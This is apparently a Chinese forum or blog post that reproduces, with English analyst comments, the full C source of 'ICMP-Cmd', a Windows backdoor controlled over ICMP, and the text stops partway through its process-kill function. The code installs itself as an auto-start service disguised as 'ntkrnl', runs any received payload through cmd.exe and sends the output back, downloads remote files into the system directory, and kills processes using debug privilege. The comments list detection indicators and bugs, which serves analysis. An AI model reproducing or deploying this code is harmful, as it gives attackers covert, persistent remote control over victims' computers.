代码从网上所得,是一个通过 ICMP 协议通讯的例子(原作者信息见代码中的 usage 函数)。服务器端注册为系统服务。需要注意的是,它支持的功能并不只有 list process、stop process 以及卸载服务器端所注册的服务:从 decode_resp 可以看到,凡是未匹配到这几个命令的载荷都会被交给 cmd.exe /c 执行,以 http:// 开头的载荷还会把远程文件下载到系统目录。换言之,这是一个以 ICMP 序列号(1234)作为唯一“口令”、既无加密也无认证的远程命令后门,只应在隔离环境中分析研究。
服务器端代码如下:
#include <winsock2.h>
#include <stdio.h>
#include <urlmon.h>
#include <tlhelp32.h>
// #include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
// Tunables for the ICMP transport below.
// ICMP_PASSWORD is compared against the 16-bit ICMP sequence field of every
// received packet (see decode_resp). It is the ONLY gate in this program:
// cleartext, 16-bit keyspace, compared without ntohs, so any host that can
// reach this machine with ICMP can drive it. Detection: inbound ICMP whose
// sequence bytes on the wire are D2 04 (1234 little-endian).
#define ICMP_PASSWORD 1234
#define STATUS_FAILED 0xFFFF   // exit code handed to ExitProcess when socket setup fails
#define MAX_PACKET 6500        // size in bytes of the heap buffers used for send/receive
// Zero-initialised allocation from the process heap. No caller in this file
// ever frees what it returns (see CmdService and send).
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
/* The IP header. decode_resp treats every datagram read from the raw socket
 * as starting with this header and skips h_len*4 bytes to reach ICMP.
 * Field order matters: h_len is declared before version, relying on the
 * compiler placing the first bit-field in the low-order bits so that h_len
 * reads the IHL nibble of the first byte. */
typedef struct iphdr {
unsigned int h_len: 4 ; // header length in 32-bit words (IHL)
unsigned int version: 4 ; // IP version, 4 for IPv4
unsigned char tos; // type of service
unsigned short total_len; // total length in bytes (as on the wire, not byte-swapped here)
unsigned short ident; // identification
unsigned short frag_and_flags; // 3 flag bits plus 13-bit fragment offset
unsigned char ttl; // time to live
unsigned char proto; // protocol (TCP, UDP, ...)
unsigned short checksum; // header checksum
unsigned int sourceIP; // source address
unsigned int destIP; // destination address
}IpHeader;
// ICMP header as used by this program: the 8 standard bytes plus a 4-byte
// timestamp, 12 bytes in total (this is the "+ 12" payload offset in decode_resp).
typedef struct _ihdr
{
BYTE i_type; // type; fill_icmp_data always emits 0 (echo reply)
BYTE i_code; // code
USHORT i_cksum; // checksum over header + payload, computed in send()
USHORT i_id; // identifier; fill_icmp_data stores the low 16 bits of the process id
USHORT i_seq; // sequence number; doubles as the command gate (inbound 1234, outbound 4321)
ULONG timestamp; // GetTickCount() at send time
}IcmpHeader;
char arg[ 256 ]; // command text copied out of the ICMP payload (the copy does not NUL-terminate it)
char buffer[ 2048 ] = { 0 }; // reply text: cmd.exe pipe output, process list or a status message
void decode_resp( char * , int , struct sockaddr_in * ); // parse one received datagram and dispatch its command
void fill_icmp_data( char * icmp_data); // build the outbound ICMP header + payload from `buffer`
void pslist( void ); // append the running-process list to `buffer`
BOOL killps(DWORD id); // terminate a process by PID
void send( void ); // ship `buffer` to ICMP_DEST_IP as a raw ICMP message
char * ICMP_DEST_IP; // dotted-quad of the last command's sender; points into inet_ntoa's static storage
USHORT checksum(USHORT * buffer, int size); // RFC 1071 one's-complement checksum
HANDLE hMutex; // used by CmdControl; never created anywhere in the code shown
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void WINAPI ICMP_CmdStart(DWORD,LPTSTR * ); // ServiceMain for the "ntkrnl" service
void WINAPI CmdControl(DWORD); // SCM control handler
DWORD WINAPI CmdService(LPVOID); // worker: the ICMP receive loop
void InstallCmdService( void ); // persist as the auto-start service "ntkrnl"
void RemoveCmdService( void ); // undo InstallCmdService
void usage( char * par); // banner and command-line help
// Process entry point.
// NOTE(review): the whole service-dispatch path (the "-install"/"-remove"
// switches and StartServiceCtrlDispatcher for the "ntkrnl" service) is
// compiled out by `#if 0`, so as pasted the binary ignores its arguments and
// runs the ICMP receive loop directly in the foreground of a normal process.
int main( int argc, char * argv[])
{
#if 0
SERVICE_TABLE_ENTRY DispatchTable[] = {{ " ntkrnl " ,ICMP_CmdStart},{NULL,NULL}};
if (argc == 2 )
{
if ( ! stricmp(argv[ 1 ], " -install " ))
{
usage(argv[ 0 ]);
InstallCmdService();
}
else if ( ! stricmp(argv[ 1 ], " -remove " ))
{
usage(argv[ 0 ]);
RemoveCmdService();
}
else usage(argv[ 0 ]);
return 0 ;
}
else usage(argv[ 0 ]);
StartServiceCtrlDispatcher(DispatchTable);
#endif
CmdService( 0 ); // blocking receive loop; only a fatal socket error makes it return
return 0 ;
}
// ServiceMain for "ntkrnl": registers the control handler, reports RUNNING to
// the SCM, then starts CmdService on a new thread.
//   dwArgc / lpArgv - SCM start arguments, unused
// NOTE(review): RUNNING is reported before the worker thread exists, the
// thread handle is never closed, and a CreateThread failure leaves the service
// reported as RUNNING while doing nothing. Errors go to OutputDebugString only.
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR * lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0 ;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
ServiceStatusHandle = RegisterServiceCtrlHandler( " ntkrnl " ,CmdControl);
if (ServiceStatusHandle == 0 )
{
OutputDebugString( " RegisterServiceCtrlHandler Error ! " );
return ;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING; // reported before the worker thread is created
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdStart Error ! " );
return ;
}
hThread = CreateThread(NULL, 0 ,CmdService,NULL, 0 ,NULL); // handle is never closed
if (hThread == NULL)
{
OutputDebugString( " CreateThread in CmdStart Error ! " );
}
return ;
}
// SCM control handler for the "ntkrnl" service.
//   dwCode - SERVICE_CONTROL_* code delivered by the SCM
// PAUSE/CONTINUE only change the reported state: nothing in CmdService reads
// ServiceStatus, so the receive loop keeps running while "paused".
// STOP reports SERVICE_STOPPED but does not signal CmdService either.
// hMutex is never created anywhere in the code shown, so the
// WaitForSingleObject/ReleaseMutex/CloseHandle trio presumably operates on a
// NULL handle; their return values are ignored.
void WINAPI CmdControl(DWORD dwCode)
{
switch (dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break ;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break ;
case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE); // hMutex is never initialised in this file
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0 ;
ServiceStatus.dwCheckPoint = 0 ;
ServiceStatus.dwWaitHint = 0 ;
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl in Switch Error ! " );
}
ReleaseMutex(hMutex);
CloseHandle(hMutex);
return ; // STOP path reports its own status and skips the common SetServiceStatus below
case SERVICE_CONTROL_INTERROGATE:
break ;
default :
break ;
}
if (SetServiceStatus(ServiceStatusHandle, & ServiceStatus) == 0 )
{
OutputDebugString( " SetServiceStatus in CmdControl out Switch Error ! " );
}
return ;
}
// Service worker / receive loop: opens a raw ICMP socket and hands every
// datagram to decode_resp() until a fatal socket error breaks the loop.
//   lpParam - unused (ICMP_CmdStart passes NULL, main passes 0)
// Returns 0 only after a non-timeout socket error; otherwise it never returns.
// Raw sockets on Windows presumably need an elevated process, which is why
// this is meant to run as a service.
// NOTE(review): the two error printf()s pass an int to "%s" (undefined
// behaviour); recvbuf is never NULL-checked; neither heap buffer is freed;
// and the memset at the bottom of the loop uses sizeof(recvbuf) — the size of
// a pointer — so it clears only the first 4/8 bytes of the buffer.
DWORD WINAPI CmdService(LPVOID lpParam) // service main: the service's work lives here
{
char * icmp_data;
int bread,datasize,retval;
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaData;
struct sockaddr_in dest,from;
int fromlen = sizeof (from);
int timeout = 2000 ; // SO_RCVTIMEO in ms; a timeout just re-enters the loop
char * recvbuf;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 )
{
printf( " WSAStartup failed: %s " ,retval); // int passed for %s
ExitProcess(STATUS_FAILED);
}
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED);
if (sockRaw == INVALID_SOCKET)
{
printf( " WSASocket() failed: %s " ,WSAGetLastError()); // int passed for %s
ExitProcess(STATUS_FAILED);
}
__try{ // MSVC structured exception handling: __finally runs on every __leave
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,( char * ) & timeout, sizeof (timeout));
if (bread == SOCKET_ERROR) __leave;
memset( & dest, 0 , sizeof (dest)); // dest stays 0.0.0.0: the probe sent below has no real target
dest.sin_family = AF_INET;
datasize = 0 ;
datasize += sizeof (IcmpHeader); // 12-byte all-zero ICMP message (type 0, seq 0)
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET); // never NULL-checked, never freed
if ( ! icmp_data) {
// fprintf(stderr,"HeapAlloc failed %d ",GetLastError());
__leave;
}
memset(icmp_data, 0 ,MAX_PACKET);
for (;;) {
int bwrote;
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest)); // result ignored
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET, 0 ,( struct sockaddr * ) & from, & fromlen); // raw socket: IP header included
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) continue ;
__leave;
}
decode_resp(recvbuf,bread, & from);
Sleep( 200 );
memset(recvbuf, 0 , sizeof (recvbuf)); // sizeof a pointer: clears 4/8 bytes, not MAX_PACKET
}
}
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
// Persistence: copy this executable to <system dir>/ntkrnl.exe (a name chosen
// to resemble the kernel image), register it as an auto-start Win32 service
// named "ntkrnl", start it, and poll until it leaves SERVICE_START_PENDING.
// Progress goes to stdout via printf; there is no return value.
// Detection / IOCs: service name and display name "ntkrnl", image file
// <system dir>\ntkrnl.exe, binary path registered with the SCM as the bare
// relative name "ntkrnl.exe", NULL account name (LocalSystem per the
// CreateService contract). Error code 5 == ERROR_ACCESS_DENIED.
// NOTE(review): InstallServiceStatus is read after the poll loop even if the
// first QueryServiceStatus call fails, in which case it is uninitialised.
void InstallCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " ); // forward slash; Win32 path APIs accept it
lpHostName = NULL; // local SCM
printf( " Transmitting File ... " );
hSearch = FindFirstFile(lpImagePath, & FileData); // existence test only
if (hSearch == INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); // path of the running image
if (CopyFile(lpCurrentPath,lpImagePath,FALSE) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == 5 ) // ERROR_ACCESS_DENIED
{
printf( " Failure ... Access is Denied ! " );
}
else
{
printf( " Failure ! " );
}
return ;
}
else
{
printf( " Success ! " );
}
}
else
{
printf( " already Exists ! " );
FindClose(hSearch);
}
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Open Service Control Manager Database Failure ! " );
return ;
}
printf( " Creating Service .... " );
schService = CreateService(schSCManager, " ntkrnl " , " ntkrnl " ,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE, " ntkrnl.exe " ,NULL,NULL,NULL,NULL,NULL); // relative binary path; NULL account = LocalSystem
if (schService == NULL)
{
dwErrorCode = GetLastError();
if (dwErrorCode != ERROR_SERVICE_EXISTS)
{
printf( " Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf( " already Exists ! " );
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_START); // reuse the existing registration
if (schService == NULL)
{
printf( " Opening Service .... Failure ! " );
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf( " Success ! " );
}
printf( " Starting Service .... " );
if (StartService(schService, 0 ,NULL) == 0 )
{
dwErrorCode = GetLastError();
if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
{
printf( " already Running ! " );
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else
{
printf( " Pending ... " );
}
while (QueryServiceStatus(schService, & InstallServiceStatus) != 0 ) // poll until no longer START_PENDING
{
if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING)
{
Sleep( 100 );
}
else
{
break ;
}
}
if (InstallServiceStatus.dwCurrentState != SERVICE_RUNNING) // uninitialised if the first query failed
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
// Uninstall: stop and delete the "ntkrnl" service, then delete
// <system dir>/ntkrnl.exe. Also reachable remotely through the "remove" ICMP
// command in decode_resp; when that happens inside the service itself, the
// ControlService call below asks the SCM to stop the calling process.
// Error codes: 5 == ERROR_ACCESS_DENIED, 1060 == ERROR_SERVICE_DOES_NOT_EXIST.
// NOTE(review): when OpenService fails, schSCManager is closed inside the
// branch and again after it, and CloseServiceHandle is called on the NULL
// schService; left as is.
void RemoveCmdService( void )
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
char * lpHostName;
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath, " /ntkrnl.exe " ); // same image path InstallCmdService writes to
lpHostName = NULL; // local SCM
schSCManager = OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf( " Opening SCM ......... " );
dwErrorCode = GetLastError();
if (dwErrorCode != 5 ) // 5 == ERROR_ACCESS_DENIED
{
printf( " Failure ! " );
}
else
{
printf( " Failuer ... Access is Denied ! " );
}
return ;
}
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_ALL_ACCESS);
if (schService == NULL)
{
printf( " Opening Service ..... " );
dwErrorCode = GetLastError();
if (dwErrorCode == 1060 ) // ERROR_SERVICE_DOES_NOT_EXIST
{
printf( " no Exists ! " );
}
else
{
printf( " Failure ! " );
}
CloseServiceHandle(schSCManager); // closed again below
}
else
{
printf( " Stopping Service .... " );
if (QueryServiceStatus(schService, & RemoveServiceStatus) != 0 )
{
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " already Stopped ! " );
}
else
{
printf( " Pending ... " );
if (ControlService(schService,SERVICE_CONTROL_STOP, & RemoveServiceStatus) != 0 )
{
while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING) // poll; QueryServiceStatus result unchecked
{
Sleep( 10 );
QueryServiceStatus(schService, & RemoveServiceStatus);
}
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " Success ! " );
}
else
{
printf( " Failure ! " );
}
}
else
{
printf( " Failure ! " );
}
}
}
else
{
printf( " Query Failure ! " );
}
printf( " Removing Service .... " );
if (DeleteService(schService) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService); // NULL handle when OpenService failed above
printf( " Removing File ....... " );
Sleep( 1500 ); // presumably gives the service process time to exit before its image is deleted
hSearch = FindFirstFile(lpImagePath, & FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
printf( " no Exists ! " );
}
else
{
if (DeleteFile(lpImagePath) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
FindClose(hSearch);
}
return ;
}
// Dispatch one received raw-socket datagram as a backdoor command.
//   buf   - full IP datagram as returned by recvfrom on the raw ICMP socket
//   bytes - number of bytes actually received (never consulted below)
//   from  - source address of the datagram; the reply goes back to it
// Command grammar (payload starts 12 bytes into the ICMP message, i.e. right
// after the 12-byte IcmpHeader): "pskill <pid>", "pslist", "remove",
// "http://<url>-<filename>"; anything else is handed to cmd.exe /c and its
// output is sent back. The only gate is icmphdr->i_seq == ICMP_PASSWORD; the
// ICMP type/code and the source address are not checked, so any ICMP-capable
// peer can issue commands.
//
// NOTE(review): documented for analysts, deliberately NOT fixed (this is a
// remote-command backdoor):
//  * no bounds check against `bytes`: the 256-byte memcpy reads past the end
//    of what was received (still inside the MAX_PACKET heap buffer);
//  * `arg` is not NUL-terminated by that copy, yet strstr/strcmp/strcat treat
//    it as a C string;
//  * "pskill" passes strstr()'s result straight to atoi — NULL if the
//    delimiter is absent;
//  * the download branch copies up to ~254 bytes into url[200] and writes
//    through strstr(fname, ...) without a NULL check;
//  * the cmd.exe branch strcat's the 256-byte arg into cmdline[270] after the
//    system directory and "/cmd.exe /c ".
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ; // IHL is in 32-bit words; taken from the packet, unvalidated
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == ICMP_PASSWORD) // raw compare, no ntohs: wire bytes D2 04
{
ICMP_DEST_IP = inet_ntoa(from -> sin_addr); // static inet_ntoa storage; consumed by send()
memcpy(arg,buf + iphdrlen + 12 , 256 ); // 12 == sizeof(IcmpHeader); copies 256 bytes regardless of `bytes`
if ( ! memcmp(arg, " pskill " , 6 ))
{
killps(atoi(strstr(arg, " "))); // strstr may return NULL when the delimiter is missing
memcpy(buffer, " Process is Killed! " , sizeof ( " Process is Killed! " )); // reported even when killps failed
send();
}
else if ( ! memcmp(arg, " pslist " , 6 )){pslist();send();}
else if ( ! strcmp(arg, " remove " ))
{
RemoveCmdService(); // self-uninstall: stop/delete the "ntkrnl" service and its file
memcpy(buffer, " Service Removed! " , sizeof ( " Service Removed! " ));
send();
return ;
}
// ---- HTTP download: "http://<url>-<filename>" -> <system dir>/<filename> ----
else if ( ! memcmp(arg, " http:// " , 7 ))
{
if ( char * FileName = strstr(arg, " - " )) // C++ only: declaration inside the condition
{
char url[ 200 ]; // FileName - arg - 1 may exceed 200: stack overflow
memset(url, 0 , 200 );
memcpy(url,arg, int (FileName - arg - 1 ));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName ++ ;
strcat(fname, " / " );
strcat(fname,FileName); // filename is attacker-supplied and not sanitised
* strstr(fname, " " ) = NULL; // NULL deref if the trailing delimiter is missing
HRESULT hRet = URLDownloadToFile( 0 ,url,fname, 0 , 0 ); // drops the file into the system directory
memset(buffer, 0 , sizeof (buffer));
if (hRet == S_OK) memcpy(buffer, " Download OK! " , sizeof ( " Download OK " )); // copies the text without its terminator; buffer was just zeroed
else
memcpy(buffer, " Download Failure! " , sizeof ( " Download Failure! " ));
send();
return ;
}
}
// ---- default: run the payload through cmd.exe /c and ship its output back ----
else {
SECURITY_ATTRIBUTES sa; // anonymous inheritable pipe capturing cmd's stdout/stderr
HANDLE hRead,hWrite;
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE; // applies to both ends: the child inherits hRead as well
if ( ! CreatePipe( & hRead, & hWrite, & sa, 0 ))
{
printf( " Error On CreatePipe() " );
return ;
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof (STARTUPINFO);
GetStartupInfo( & si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE; // hidden console window
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
char cmdline[ 270 ];
GetSystemDirectory(cmdline,MAX_PATH + 1 );
strcat(cmdline, " /cmd.exe /c " );
strcat(cmdline,arg); // unbounded: sysdir + 12 + up to 256 bytes into cmdline[270]
if ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi))
{
printf( " Error on CreateProcess() " );
return ;
}
CloseHandle(hWrite);
DWORD bytesRead;
for (;;){
// Each ReadFile overwrites buffer from offset 0, so only the last chunk
// survives, and a full 2048-byte read leaves no NUL for send()'s strlen.
if ( ! ReadFile(hRead,buffer, 2048 , & bytesRead,NULL)) break ;
Sleep( 200 );
}
// hRead, pi.hProcess and pi.hThread are never closed.
send();
}
}
// Packets whose sequence number is not ICMP_PASSWORD are silently dropped.
}
// RFC 1071 Internet checksum: one's-complement sum of 16-bit words over
// `size` bytes (a trailing odd byte is added as its own term), folded to
// 16 bits and complemented.
//   buffer - start of the data to sum
//   size   - number of bytes
// Returns the 16-bit checksum; 0xFFFF for size <= 0.
USHORT checksum(USHORT * buffer, int size)
{
    unsigned long acc = 0;
    USHORT *word = buffer;
    int remaining = size;

    for (; remaining > 1; remaining -= (int)sizeof(USHORT))
        acc += *word++;

    if (remaining)                          // odd trailing byte
        acc += *(UCHAR *)word;

    acc = (acc >> 16) + (acc & 0xffff);     // fold the carries into the low half
    acc += (acc >> 16);                     // fold the carry the fold itself may produce
    return (USHORT)(~acc);
}
// Build the outbound ICMP message in icmp_data: a 12-byte IcmpHeader followed
// by the current contents of the global `buffer` (without its NUL).
//   icmp_data - caller-provided storage of at least sizeof(IcmpHeader) +
//               strlen(buffer) bytes (send() allocates MAX_PACKET)
// The header values are the reply fingerprint: type 0 (echo reply), code 0,
// id = low 16 bits of this PID, seq = 4321 (0x10E1; no htons is applied, so
// the wire bytes are E1 10), timestamp = GetTickCount(). The checksum field
// is zeroed here and filled in afterwards by send().
// Detection: unsolicited ICMP echo replies with seq 4321 carrying process
// lists or command output in the payload.
void fill_icmp_data( char * icmp_data)
{
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ; // echo reply
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT) GetCurrentProcessId();
icmp_hdr -> i_cksum = 0 ; // computed over the finished message by send()
icmp_hdr -> i_seq = 4321 ; // reply marker
icmp_hdr -> timestamp = GetTickCount();
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,buffer,strlen(buffer)); // requires `buffer` to be NUL-terminated
// for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i];
}
// Print the banner (original author's attribution) and command-line help.
//   par - program name to show in the usage lines (argv[0])
// Only reachable from the `#if 0` section of main as pasted.
void usage( char * par)
{
printf( " =====Welcome to www.hackerxfiles.net====== " );
printf( " " );
printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- " );
printf( " ---[ E-mail: gxisone@hotmail.com ]--- " );
printf( " ---[ 2003/8/15 ]--- " );
printf( " " );
printf( " Usage: %s -install (to install service) " ,par);
printf( " %s -remove (to remove service) " ,par);
printf( " " );
return ;
}
// Send the global `buffer` to ICMP_DEST_IP as one raw ICMP message (header
// values in fill_icmp_data), then clear `buffer`.
// This declares a `send` with a different signature from Winsock's send();
// it compiles as a C++ overload, consistent with the other C++-only
// constructs in the file (declaration inside an `if` condition).
// NOTE(review): WSAStartup/WSASocket failures call ExitProcess and so take
// the whole service down; icmp_data is HeapAlloc'ed on every call and never
// freed; datasize is strlen(buffer) + 12, so `buffer` must be NUL-terminated,
// which the ReadFile loop in decode_resp does not guarantee.
void send( void )
{
WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000 ; // SO_SNDTIMEO in ms
char * icmp_data;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 ) ExitProcess(STATUS_FAILED);
if ((sockRaw = WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED))
== INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if ((bread = setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,( char * ) & timeout, sizeof (timeout))) == SOCKET_ERROR) __leave;
// send timeout set above
memset( & dest, 0 , sizeof (dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP); // sender of the last accepted command
datasize = strlen(buffer);
datasize += sizeof (IcmpHeader);
icmp_data = ( char * )xmalloc(MAX_PACKET); // never freed
if ( ! icmp_data) __leave;
memset(icmp_data, 0 ,MAX_PACKET);
fill_icmp_data(icmp_data); // header + payload
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize); // over header + payload
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest));
if (bwrote == SOCKET_ERROR)
{
// if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out ");
// printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}
// printf("Send Packet to %s Success! "<<ICMP_DEST_IP<<endl;
}
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer, 0 , sizeof (buffer)); // reply consumed; reset for the next command
Sleep( 200 );
}
// Append "<exe> <pid> " for every running process to the global `buffer`
// using a Toolhelp32 snapshot; send() ships the result.
// NOTE(review): `a[5]` cannot hold a PID of 10000 or more plus the NUL that
// itoa writes (stack overflow), and the strcat calls are unbounded against
// buffer[2048]; documented, deliberately not fixed.
void pslist( void )
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0 );
if (hProcessSnap == (HANDLE) - 1 ) // INVALID_HANDLE_VALUE
{
printf( " CreateToolhelp32Snapshot() failed:%d " ,GetLastError());
return ;
}
pe32.dwSize = sizeof (PROCESSENTRY32);
printf( " ProcessName ProcessID " );
if (Process32First(hProcessSnap, & pe32))
{
char a[ 5 ]; // too small for 5+ digit PIDs
do
{
strcat(buffer,pe32.szExeFile); // unbounded append
strcat(buffer, " " );
itoa(pe32.th32ProcessID,a, 10 );
strcat(buffer,a);
strcat(buffer, " " );
// printf(" %-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, & pe32));
}
else
{
printf( " Process32Firstt() failed:%d " ,GetLastError());
}
CloseHandle (hProcessSnap);
return ;
}
// Enable or disable one named privilege on a token (the usual MSDN sample).
//   hToken           - token to adjust (killps opens its own with TOKEN_ALL_ACCESS)
//   lpszPrivilege    - privilege name, e.g. SE_DEBUG_NAME
//   bEnablePrivilege - TRUE to enable, FALSE to clear the attribute
// Returns TRUE on success, FALSE on failure (an error message is printed).
// The AdjustTokenPrivileges return value is ignored; success is judged from
// GetLastError() alone, so ERROR_NOT_ALL_ASSIGNED (the token does not hold
// the privilege) is reported as failure.
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) // raise privilege
{
TOKEN_PRIVILEGES tp;
LUID luid;
if ( ! LookupPrivilegeValue(NULL,lpszPrivilege, & luid))
{
printf( " LookupPrivilegeValue error:%d " , GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1 ;
tp.Privileges[ 0 ].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[ 0 ].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[ 0 ].Attributes = 0 ;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
& tp,
sizeof (TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf( " AdjustTokenPrivileges failed: %u " , GetLastError() );
return FALSE;
}
return TRUE;
}
/// /
// Terminate the process with PID `id`: enable SeDebugPrivilege on this
// process's own token so OpenProcess(PROCESS_ALL_ACCESS) succeeds on
// processes it could not otherwise open, then TerminateProcess with exit code 1.
//   id - target process id (parsed from the "pskill" command in decode_resp)
// Returns TRUE only if TerminateProcess succeeded. Handles are released in
// the __finally block. `bRet` is unused.
BOOL killps(DWORD id)
{
HANDLE hProcess = NULL,hProcessToken = NULL;
BOOL IsKilled = FALSE,bRet = FALSE;
__try
{
if ( ! OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS, & hProcessToken))
{
printf( " Open Current Process Token failed:%d " ,GetLastError());
__leave;
}
// printf(" Open Current Process Token ok!");
if ( ! SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE)) // SeDebugPrivilege
{
__leave;
}
printf( " SetPrivilege ok! " );
if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,id)) == NULL)
{
printf( " Open Process %d failed:%d " ,id,GetLastError());
__leave;
}
// printf(" Open Process %d ok!",id);
if ( ! TerminateProcess(hProcess, 1 ))
{
